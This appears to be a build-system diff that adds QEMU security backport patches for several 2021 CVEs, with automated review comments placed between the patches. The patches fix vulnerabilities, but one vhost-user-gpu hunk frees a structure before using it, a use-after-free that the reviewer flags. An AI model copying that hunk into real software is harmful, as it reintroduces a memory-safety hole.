+ Refer to Table 6-6 and Table 6-7 for information
+ concerning the values of MT and EC versus SC and
+ EOT value.
+
+* Table 6·6. Result Phase Table
+
+* Table 6-7. Verify Command Result Phase Table
+
+Fix by aborting the transfer when EOT > # Sectors Per Side.
+
+Cc: qemu-stable@nongnu.org
+Cc: Hervé Poussineau <hpoussin@reactos.org>
+Fixes: baca51faff0 ("floppy driver: disk geometry auto detect")
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Resolves: https://gitlab.com/qemu-project/qemu/-/issues/339
+Signed-off-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Message-Id: <20211118115733.4038610-2-philmd@redhat.com>
+Reviewed-by: Hanna Reitz <hreitz@redhat.com>
+Signed-off-by: Kevin Wolf <kwolf@redhat.com>
+
+Upstream-Status: Backport [https://github.com/qemu/qemu/commit/defac5e2fbddf8423a354ff0454283a2115e1367]
+CVE: CVE-2021-3507
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ hw/block/fdc.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/hw/block/fdc.c b/hw/block/fdc.c
+index 347875a0cdae..57bb355794a9 100644
+--- a/hw/block/fdc.c
++++ b/hw/block/fdc.c
+@@ -1530,6 +1530,14 @@ static void fdctrl_start_transfer(FDCtrl *fdctrl, int direction)
+ int tmp;
+ fdctrl->data_len = 128 << (fdctrl->fifo[5] > 7 ? 7 : fdctrl->fifo[5]);
+ tmp = (fdctrl->fifo[6] - ks + 1);
++ if (tmp < 0) {
++ FLOPPY_DPRINTF("invalid EOT: %d\n", tmp);
++ fdctrl_stop_transfer(fdctrl, FD_SR0_ABNTERM, FD_SR1_MA, 0x00);
++ fdctrl->fifo[3] = kt;
++ fdctrl->fifo[4] = kh;
++ fdctrl->fifo[5] = ks;
++ return;
++ }
+ if (fdctrl->fifo[0] & 0x80)
+ tmp += fdctrl->fifo[6];
+ fdctrl->data_len *= tmp;
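Review bot: The added guard in `fdctrl_start_transfer` tests `tmp < 0`, where `tmp = fdctrl->fifo[6] - ks + 1`, while the patch description states the rule as "EOT > # Sectors Per Side", and the code has no comment linking the two. A reader has to work out that the guard rejects a sector count that went negative, so a comment above it would help, e.g. `/* fifo[6] - ks + 1 < 0: negative sector count, stop with abnormal termination */`. A `tmp` of 0 still passes the guard and reaches `fdctrl->data_len *= tmp`; how a zero-length transfer is handled is outside the hunk.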
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-1.patch
new file mode 100644
index 0000000000..77a5385692
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-1.patch
@@ -0,0 +1,42 @@
+From 05a40b172e4d691371534828078be47e7fff524c Mon Sep 17 00:00:00 2001
+From: Gerd Hoffmann <kraxel@redhat.com>
+Date: Mon, 3 May 2021 15:29:15 +0200
+Subject: [PATCH] usb: limit combined packets to 1 MiB (CVE-2021-3527)
+
+usb-host and usb-redirect try to batch bulk transfers by combining many
+small usb packets into a single, large transfer request, to reduce the
+overhead and improve performance.
+
+This patch adds a size limit of 1 MiB for those combined packets to
+restrict the host resources the guest can bind that way.
+
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+Message-Id: <20210503132915.2335822-6-kraxel@redhat.com>
+
+Upstream-Status: Backport
+https://gitlab.com/qemu-project/qemu/-/commit/05a40b172e4d691371534828078be47e7fff524c
+CVE: CVE-2021-3527
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ hw/usb/combined-packet.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/hw/usb/combined-packet.c b/hw/usb/combined-packet.c
+index 5d57e883dc..e56802f89a 100644
+--- a/hw/usb/combined-packet.c
++++ b/hw/usb/combined-packet.c
+@@ -171,7 +171,9 @@ void usb_ep_combine_input_packets(USBEndpoint *ep)
+ if ((p->iov.size % ep->max_packet_size) != 0 || !p->short_not_ok ||
+ next == NULL ||
+ /* Work around for Linux usbfs bulk splitting + migration */
+- (totalsize == (16 * KiB - 36) && p->int_req)) {
++ (totalsize == (16 * KiB - 36) && p->int_req) ||
++ /* Next package may grow combined package over 1MiB */
++ totalsize > 1 * MiB - ep->max_packet_size) {
+ usb_device_handle_data(ep->dev, first);
+ assert(first->status == USB_RET_ASYNC);
+ if (first->combined) {
+--
+GitLab
+
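Review bot: The new bound in `usb_ep_combine_input_packets` is written as the bare expression `totalsize > 1 * MiB - ep->max_packet_size`, and the comment above it says "package" where the description and the file name say packet. Naming the limit would make the 1 MiB cap from the description easy to find and reuse, for example a new macro (name is a suggestion) `#define USB_COMBINED_MAX_SIZE (1 * MiB)` with the condition `totalsize > USB_COMBINED_MAX_SIZE - ep->max_packet_size`. The cap presumably relies on `ep->max_packet_size` being the largest amount a single further packet can add to `totalsize`; that assumption is worth stating in the comment, since the accumulation happens outside the hunk.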
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-2.patch
new file mode 100644
index 0000000000..6371aced12
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-2.patch
@@ -0,0 +1,59 @@
+From 7ec54f9eb62b5d177e30eb8b1cad795a5f8d8986 Mon Sep 17 00:00:00 2001
+From: Gerd Hoffmann <kraxel@redhat.com>
+Date: Mon, 3 May 2021 15:29:12 +0200
+Subject: [PATCH] usb/redir: avoid dynamic stack allocation (CVE-2021-3527)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Use autofree heap allocation instead.
+
+Fixes: 4f4321c11ff ("usb: use iovecs in USBPacket")
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+Tested-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Message-Id: <20210503132915.2335822-3-kraxel@redhat.com>
+
+Upstream-Status: Backport
+https://gitlab.com/qemu-project/qemu/-/commit/7ec54f9eb62b5d177e30eb8b1cad795a5f8d8986
+CVE: CVE-2021-3527
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ hw/usb/redirect.c | 6 +++---
+ 1 file changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/hw/usb/redirect.c b/hw/usb/redirect.c
+index 17f06f3417..6a75b0dc4a 100644
+--- a/hw/usb/redirect.c
++++ b/hw/usb/redirect.c
+@@ -620,7 +620,7 @@ static void usbredir_handle_iso_data(USBRedirDevice *dev, USBPacket *p,
+ .endpoint = ep,
+ .length = p->iov.size
+ };
+- uint8_t buf[p->iov.size];
++ g_autofree uint8_t *buf = g_malloc(p->iov.size);
+ /* No id, we look at the ep when receiving a status back */
+ usb_packet_copy(p, buf, p->iov.size);
+ usbredirparser_send_iso_packet(dev->parser, 0, &iso_packet,
+@@ -818,7 +818,7 @@ static void usbredir_handle_bulk_data(USBRedirDevice *dev, USBPacket *p,
+ usbredirparser_send_bulk_packet(dev->parser, p->id,
+ &bulk_packet, NULL, 0);
+ } else {
+- uint8_t buf[size];
++ g_autofree uint8_t *buf = g_malloc(size);
+ usb_packet_copy(p, buf, size);
+ usbredir_log_data(dev, "bulk data out:", buf, size);
+ usbredirparser_send_bulk_packet(dev->parser, p->id,
+@@ -923,7 +923,7 @@ static void usbredir_handle_interrupt_out_data(USBRedirDevice *dev,
+ USBPacket *p, uint8_t ep)
+ {
+ struct usb_redir_interrupt_packet_header interrupt_packet;
+- uint8_t buf[p->iov.size];
++ g_autofree uint8_t *buf = g_malloc(p->iov.size);
+
+ DPRINTF("interrupt-out ep %02X len %zd id %"PRIu64"\n", ep,
+ p->iov.size, p->id);
+--
+GitLab
+
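Review bot: The three `g_autofree uint8_t *buf = g_malloc(...)` allocations (in `usbredir_handle_iso_data`, `usbredir_handle_bulk_data` and `usbredir_handle_interrupt_out_data`) take their size from `p->iov.size` or `size`, with no bound visible in these hunks. Moving the buffer off the stack removes the variable-length array, but `g_malloc` aborts the process when the allocation fails, so the upper limit has to be enforced elsewhere; CVE-2021-3527-1.patch adds a 1 MiB cap for combined packets. A comment at each site naming where the size is bounded, e.g. `/* size is bounded by the combined-packet limit, see hw/usb/combined-packet.c */`, would keep that dependency visible, if that is indeed the bound that applies to all three paths. All three functions extend beyond their hunks.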
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3544.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544.patch
new file mode 100644
index 0000000000..1b4fcbfb60
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544.patch
@@ -0,0 +1,29 @@
+vhost-user-gpu: fix resource leak in 'vg_resource_create_2d' (CVE-2021-3544)
+
+Call 'vugbm_buffer_destroy' in error path to avoid resource leak.
+
+Fixes: CVE-2021-3544
+Reported-by: default avatarLi Qiang <liq3ea@163.com>
+Reviewed-by: default avatarPrasad J Pandit <pjp@fedoraproject.org>
+Signed-off-by: default avatarLi Qiang <liq3ea@163.com>
+Reviewed-by: Marc-André Lureau's avatarMarc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20210516030403.107723-3-liq3ea@163.com>
+Signed-off-by: Gerd Hoffmann's avatarGerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+[vhost-user-gpu does not exist in 4.2.0]
+CVE: CVE-2021-3544
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+Index: qemu-4.2.0/contrib/vhost-user-gpu/main.c
+===================================================================
+--- qemu-4.2.0.orig/contrib/vhost-user-gpu/main.c
++++ qemu-4.2.0/contrib/vhost-user-gpu/main.c
+@@ -328,6 +328,7 @@ vg_resource_create_2d(VuGpu *g,
+ g_critical("%s: resource creation failed %d %d %d",
+ __func__, c2d.resource_id, c2d.width, c2d.height);
+ g_free(res);
++ vugbm_buffer_destroy(&res->buffer);
+ cmd->error = VIRTIO_GPU_RESP_ERR_OUT_OF_MEMORY;
+ return;
+ }
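Review bot: The added `vugbm_buffer_destroy(&res->buffer);` in `vg_resource_create_2d` is placed after `g_free(res);`, so it is handed a pointer into memory that has just been freed. The description says the call belongs in the error path to avoid a leak, which only works while `res` is still valid; the two lines should be in the order `vugbm_buffer_destroy(&res->buffer);` then `g_free(res);`. The hunk shows only one error path of the function, so it is also worth comparing with the upstream commit to confirm the call landed in the intended branch.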
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_2.patch
new file mode 100644
index 0000000000..36cbb127f8
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_2.patch
@@ -0,0 +1,39 @@
+vhost-user-gpu: fix memory leak in vg_resource_attach_backing (CVE-2021-3544)
+
+
+Check whether the 'res' has already been attach_backing to avoid
+memory leak.
+
+Fixes: CVE-2021-3544
+Reported-by: default avatarLi Qiang <liq3ea@163.com>
+virtio-gpu fix: 204f01b3
+
+ ("virtio-gpu: fix memory leak
+ in resource attach backing")
+ Signed-off-by: default avatarLi Qiang <liq3ea@163.com>
+ Reviewed-by: Marc-André Lureau's avatarMarc-André Lureau <marcandre.lureau@redhat.com>
+ Message-Id: <20210516030403.107723-4-liq3ea@163.com>
+ Signed-off-by: Gerd Hoffmann's avatarGerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+[vhost-user-gpu does not exist in 4.2.0 context]
+CVE: CVE-2021-3544
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+
+Index: qemu-4.2.0/contrib/vhost-user-gpu/main.c
+===================================================================
+--- qemu-4.2.0.orig/contrib/vhost-user-gpu/main.c
++++ qemu-4.2.0/contrib/vhost-user-gpu/main.c
+@@ -468,6 +468,11 @@ vg_resource_attach_backing(VuGpu *g,
+ return;
+ }
+
++ if (res->iov) {
++ cmd->error = VIRTIO_GPU_RESP_ERR_UNSPEC;
++ return;
++ }
++
+ ret = vg_create_mapping_iov(g, &ab, cmd, &res->iov);
+ if (ret != 0) {
+ cmd->error = VIRTIO_GPU_RESP_ERR_UNSPEC;
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_3.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_3.patch
new file mode 100644
index 0000000000..c534f4c24f
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_3.patch
@@ -0,0 +1,39 @@
+vhost-user-gpu: fix memory leak while calling 'vg_resource_unref' (CVE-2021-3544)
+
+If the guest trigger following sequences, the attach_backing will be leaked:
+
+vg_resource_create_2d
+vg_resource_attach_backing
+vg_resource_unref
+
+This patch fix this by freeing 'res->iov' in vg_resource_destroy.
+
+Fixes: CVE-2021-3544
+Reported-by: default avatarLi Qiang <liq3ea@163.com>
+virtio-gpu fix: 5e8e3c4c
+
+("virtio-gpu: fix resource leak
+in virgl_cmd_resource_unref")
+Reviewed-by: default avatarPrasad J Pandit <pjp@fedoraproject.org>
+Signed-off-by: default avatarLi Qiang <liq3ea@163.com>
+Reviewed-by: Marc-André Lureau's avatarMarc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20210516030403.107723-5-liq3ea@163.com>
+Signed-off-by: Gerd Hoffmann's avatarGerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2021-3544
+[vhost-user-gpu does not exist in the 4.2.0]
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+Index: qemu-4.2.0/contrib/vhost-user-gpu/main.c
+===================================================================
+--- qemu-4.2.0.orig/contrib/vhost-user-gpu/main.c
++++ qemu-4.2.0/contrib/vhost-user-gpu/main.c
+@@ -379,6 +379,7 @@ vg_resource_destroy(VuGpu *g,
+ }
+
+ vugbm_buffer_destroy(&res->buffer);
++ g_free(res->iov);
+ pixman_image_unref(res->image);
+ QTAILQ_REMOVE(&g->reslist, res, next);
+ g_free(res);
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_4.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_4.patch
new file mode 100644
index 0000000000..96e36eb854
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_4.patch
@@ -0,0 +1,46 @@
+vhost-user-gpu: fix memory leak in 'virgl_cmd_resource_unref' (CVE-2021-3544)
+
+The 'res->iov' will be leaked if the guest trigger following sequences:
+
+virgl_cmd_create_resource_2d
+virgl_resource_attach_backing
+virgl_cmd_resource_unref
+
+This patch fixes this.
+
+Fixes: CVE-2021-3544
+Reported-by: default avatarLi Qiang <liq3ea@163.com>
+virtio-gpu fix: 5e8e3c4c
+
+("virtio-gpu: fix resource leak
+in virgl_cmd_resource_unref"
+Signed-off-by: default avatarLi Qiang <liq3ea@163.com>
+Reviewed-by: Marc-André Lureau's avatarMarc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20210516030403.107723-6-liq3ea@163.com>
+Signed-off-by: Gerd Hoffmann's avatarGerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2021-3544
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+Index: qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
+===================================================================
+--- qemu-4.2.0.orig/contrib/vhost-user-gpu/virgl.c
++++ qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
+@@ -105,9 +105,16 @@ virgl_cmd_resource_unref(VuGpu *g,
+ struct virtio_gpu_ctrl_command *cmd)
+ {
+ struct virtio_gpu_resource_unref unref;
++ struct iovec *res_iovs = NULL;
++ int num_iovs = 0;
+
+ VUGPU_FILL_CMD(unref);
+
++ virgl_renderer_resource_detach_iov(unref.resource_id,
++ &res_iovs,
++ &num_iovs);
++ g_free(res_iovs);
++
+ virgl_renderer_resource_unref(unref.resource_id);
+ }
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_5.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_5.patch
new file mode 100644
index 0000000000..e592ce50e2
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_5.patch
@@ -0,0 +1,47 @@
+From 63736af5a6571d9def93769431e0d7e38c6677bf Mon Sep 17 00:00:00 2001
+From: Li Qiang <liq3ea@163.com>
+Date: Sat, 15 May 2021 20:04:01 -0700
+Subject: [PATCH] vhost-user-gpu: fix memory leak in
+ 'virgl_resource_attach_backing' (CVE-2021-3544)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+If 'virgl_renderer_resource_attach_iov' failed, the 'res_iovs' will
+be leaked.
+
+Fixes: CVE-2021-3544
+Reported-by: Li Qiang <liq3ea@163.com>
+virtio-gpu fix: 33243031da ("virtio-gpu-3d: fix memory leak
+in resource attach backing")
+
+Signed-off-by: Li Qiang <liq3ea@163.com>
+Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20210516030403.107723-7-liq3ea@163.com>
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2021-3544
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ contrib/vhost-user-gpu/virgl.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+Index: qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
+===================================================================
+--- qemu-4.2.0.orig/contrib/vhost-user-gpu/virgl.c
++++ qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
+@@ -283,8 +283,11 @@ virgl_resource_attach_backing(VuGpu *g,
+ return;
+ }
+
+- virgl_renderer_resource_attach_iov(att_rb.resource_id,
++ ret = virgl_renderer_resource_attach_iov(att_rb.resource_id,
+ res_iovs, att_rb.nr_entries);
++ if (ret != 0) {
++ g_free(res_iovs);
++ }
+ }
+
+ static void
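Review bot: The new `if (ret != 0)` branch frees `res_iovs` but leaves `cmd->error` untouched, so as far as this hunk shows the guest still gets a success response for an attach that failed. Setting `cmd->error = VIRTIO_GPU_RESP_ERR_UNSPEC;` inside that branch would match the error style used by the main.c patches in this series. The declaration of `ret` and the start of virgl_resource_attach_backing are outside the hunk, so confirm nothing later in the caller already reports the failure.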
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3545.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3545.patch
new file mode 100644
index 0000000000..fcdda64437
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3545.patch
@@ -0,0 +1,41 @@
+From 121841b25d72d13f8cad554363138c360f1250ea Mon Sep 17 00:00:00 2001
+From: Li Qiang <liq3ea@163.com>
+Date: Sat, 15 May 2021 20:03:56 -0700
+Subject: [PATCH] vhost-user-gpu: fix memory disclosure in
+ virgl_cmd_get_capset_info (CVE-2021-3545)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Otherwise some of the 'resp' will be leaked to guest.
+
+Fixes: CVE-2021-3545
+Reported-by: Li Qiang <liq3ea@163.com>
+virtio-gpu fix: 42a8dadc74 ("virtio-gpu: fix information leak
+in getting capset info dispatch")
+
+Signed-off-by: Li Qiang <liq3ea@163.com>
+Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20210516030403.107723-2-liq3ea@163.com>
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2021-3545
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ contrib/vhost-user-gpu/virgl.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+Index: qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
+===================================================================
+--- qemu-4.2.0.orig/contrib/vhost-user-gpu/virgl.c
++++ qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
+@@ -132,6 +132,7 @@ virgl_cmd_get_capset_info(VuGpu *g,
+
+ VUGPU_FILL_CMD(info);
+
++ memset(&resp, 0, sizeof(resp));
+ if (info.capset_index == 0) {
+ resp.capset_id = VIRTIO_GPU_CAPSET_VIRGL;
+ virgl_renderer_get_cap_set(resp.capset_id,
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3546.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3546.patch
new file mode 100644
index 0000000000..f8da428233
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3546.patch
@@ -0,0 +1,47 @@
+From 9f22893adcb02580aee5968f32baa2cd109b3ec2 Mon Sep 17 00:00:00 2001
+From: Li Qiang <liq3ea@163.com>
+Date: Sat, 15 May 2021 20:04:02 -0700
+Subject: [PATCH] vhost-user-gpu: fix OOB write in 'virgl_cmd_get_capset'
+ (CVE-2021-3546)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+If 'virgl_cmd_get_capset' set 'max_size' to 0,
+the 'virgl_renderer_fill_caps' will write the data after the 'resp'.
+This patch avoid this by checking the returned 'max_size'.
+
+virtio-gpu fix: abd7f08b23 ("display: virtio-gpu-3d: check
+virgl capabilities max_size")
+
+Fixes: CVE-2021-3546
+Reported-by: Li Qiang <liq3ea@163.com>
+Reviewed-by: Prasad J Pandit <pjp@fedoraproject.org>
+Signed-off-by: Li Qiang <liq3ea@163.com>
+Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20210516030403.107723-8-liq3ea@163.com>
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2021-3546
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ contrib/vhost-user-gpu/virgl.c | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+Index: qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
+===================================================================
+--- qemu-4.2.0.orig/contrib/vhost-user-gpu/virgl.c
++++ qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
+@@ -174,6 +174,10 @@ virgl_cmd_get_capset(VuGpu *g,
+
+ virgl_renderer_get_cap_set(gc.capset_id, &max_ver,
+ &max_size);
++ if (!max_size) {
++ cmd->error = VIRTIO_GPU_RESP_ERR_INVALID_PARAMETER;
++ return;
++ }
+ resp = g_malloc0(sizeof(*resp) + max_size);
+
+ resp->hdr.type = VIRTIO_GPU_RESP_OK_CAPSET;
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3582.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3582.patch
new file mode 100644
index 0000000000..7a88e29384
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3582.patch
@@ -0,0 +1,47 @@
+From 284f191b4abad213aed04cb0458e1600fd18d7c4 Mon Sep 17 00:00:00 2001
+From: Marcel Apfelbaum <marcel@redhat.com>
+Date: Wed, 16 Jun 2021 14:06:00 +0300
+Subject: [PATCH] hw/rdma: Fix possible mremap overflow in the pvrdma device
+ (CVE-2021-3582)
+
+Ensure mremap boundaries not trusting the guest kernel to
+pass the correct buffer length.
+
+Fixes: CVE-2021-3582
+Reported-by: VictorV (Kunlun Lab) <vv474172261@gmail.com>
+Tested-by: VictorV (Kunlun Lab) <vv474172261@gmail.com>
+Signed-off-by: Marcel Apfelbaum <marcel@redhat.com>
+Message-Id: <20210616110600.20889-1-marcel.apfelbaum@gmail.com>
+Reviewed-by: Yuval Shaia <yuval.shaia.ml@gmail.com>
+Tested-by: Yuval Shaia <yuval.shaia.ml@gmail.com>
+Reviewed-by: Prasad J Pandit <pjp@fedoraproject.org>
+Signed-off-by: Marcel Apfelbaum <marcel.apfelbaum@gmail.com>
+
+CVE: CVE-2021-3582
+Upstream-Status: Backport [284f191b4abad213aed04cb0458e1600fd18d7c4]
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/rdma/vmw/pvrdma_cmd.c | 7 +++++++
+ 1 file changed, 7 insertions(+)
+
+diff --git a/hw/rdma/vmw/pvrdma_cmd.c b/hw/rdma/vmw/pvrdma_cmd.c
+index f59879e257..da7ddfa548 100644
+--- a/hw/rdma/vmw/pvrdma_cmd.c
++++ b/hw/rdma/vmw/pvrdma_cmd.c
+@@ -38,6 +38,13 @@ static void *pvrdma_map_to_pdir(PCIDevice *pdev, uint64_t pdir_dma,
+ return NULL;
+ }
+
++ length = ROUND_UP(length, TARGET_PAGE_SIZE);
++ if (nchunks * TARGET_PAGE_SIZE != length) {
++ rdma_error_report("Invalid nchunks/length (%u, %lu)", nchunks,
++ (unsigned long)length);
++ return NULL;
++ }
++
+ dir = rdma_pci_dma_map(pdev, pdir_dma, TARGET_PAGE_SIZE);
+ if (!dir) {
+ rdma_error_report("Failed to map to page directory");
+--
+2.25.1
+
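Review bot: The check `nchunks * TARGET_PAGE_SIZE != length` multiplies before widening, so if `nchunks` is a 32-bit value (the `%u` in the error message suggests it is) and the page-size macro is an int, a large guest-supplied count can wrap and still compare equal to a small `length`. Widening first closes that gap: `if ((uint64_t)nchunks * TARGET_PAGE_SIZE != length) {`. The parameter types are declared outside the hunk, so confirm them against the full pvrdma_map_to_pdir signature.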
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3607.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3607.patch
new file mode 100644
index 0000000000..0547c74484
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3607.patch
@@ -0,0 +1,43 @@
+From 32e5703cfea07c91e6e84bcb0313f633bb146534 Mon Sep 17 00:00:00 2001
+From: Marcel Apfelbaum <marcel.apfelbaum@gmail.com>
+Date: Wed, 30 Jun 2021 14:46:34 +0300
+Subject: [PATCH] pvrdma: Ensure correct input on ring init (CVE-2021-3607)
+
+Check the guest passed a non zero page count
+for pvrdma device ring buffers.
+
+Fixes: CVE-2021-3607
+Reported-by: VictorV (Kunlun Lab) <vv474172261@gmail.com>
+Reviewed-by: VictorV (Kunlun Lab) <vv474172261@gmail.com>
+Signed-off-by: Marcel Apfelbaum <marcel@redhat.com>
+Message-Id: <20210630114634.2168872-1-marcel@redhat.com>
+Reviewed-by: Yuval Shaia <yuval.shaia.ml@gmail.com>
+Tested-by: Yuval Shaia <yuval.shaia.ml@gmail.com>
+Signed-off-by: Marcel Apfelbaum <marcel.apfelbaum@gmail.com>
+
+CVE: CVE-2021-3607
+Upstream-Status: Backport [32e5703cfea07c91e6e84bcb0313f633bb146534]
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/rdma/vmw/pvrdma_main.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/hw/rdma/vmw/pvrdma_main.c b/hw/rdma/vmw/pvrdma_main.c
+index 84ae8024fc..7c0c3551a8 100644
+--- a/hw/rdma/vmw/pvrdma_main.c
++++ b/hw/rdma/vmw/pvrdma_main.c
+@@ -92,6 +92,11 @@ static int init_dev_ring(PvrdmaRing *ring, PvrdmaRingState **ring_state,
+ uint64_t *dir, *tbl;
+ int rc = 0;
+
++ if (!num_pages) {
++ rdma_error_report("Ring pages count must be strictly positive");
++ return -EINVAL;
++ }
++
+ dir = rdma_pci_dma_map(pci_dev, dir_addr, TARGET_PAGE_SIZE);
+ if (!dir) {
+ rdma_error_report("Failed to map to page directory (ring %s)", name);
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3608.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3608.patch
new file mode 100644
index 0000000000..7055ec3d23
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3608.patch
@@ -0,0 +1,40 @@
+From 66ae37d8cc313f89272e711174a846a229bcdbd3 Mon Sep 17 00:00:00 2001
+From: Marcel Apfelbaum <marcel.apfelbaum@gmail.com>
+Date: Wed, 30 Jun 2021 14:52:46 +0300
+Subject: [PATCH] pvrdma: Fix the ring init error flow (CVE-2021-3608)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Do not unmap uninitialized dma addresses.
+
+Fixes: CVE-2021-3608
+Reviewed-by: VictorV (Kunlun Lab) <vv474172261@gmail.com>
+Tested-by: VictorV (Kunlun Lab) <vv474172261@gmail.com>
+Signed-off-by: Marcel Apfelbaum <marcel@redhat.com>
+Message-Id: <20210630115246.2178219-1-marcel@redhat.com>
+Tested-by: Yuval Shaia <yuval.shaia.ml@gmail.com>
+Reviewed-by: Yuval Shaia <yuval.shaia.ml@gmail.com>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Signed-off-by: Marcel Apfelbaum <marcel.apfelbaum@gmail.com>
+
+CVE: CVE-2021-3608
+Upstream-Status: Backport [66ae37d8cc313f89272e711174a846a229bcdbd3]
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/rdma/vmw/pvrdma_dev_ring.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: qemu-4.2.0/hw/rdma/vmw/pvrdma_dev_ring.c
+===================================================================
+--- qemu-4.2.0.orig/hw/rdma/vmw/pvrdma_dev_ring.c
++++ qemu-4.2.0/hw/rdma/vmw/pvrdma_dev_ring.c
+@@ -41,7 +41,7 @@ int pvrdma_ring_init(PvrdmaRing *ring, c
+ atomic_set(&ring->ring_state->cons_head, 0);
+ */
+ ring->npages = npages;
+- ring->pages = g_malloc(npages * sizeof(void *));
++ ring->pages = g_malloc0(npages * sizeof(void *));
+
+ for (i = 0; i < npages; i++) {
+ if (!tbl[i]) {
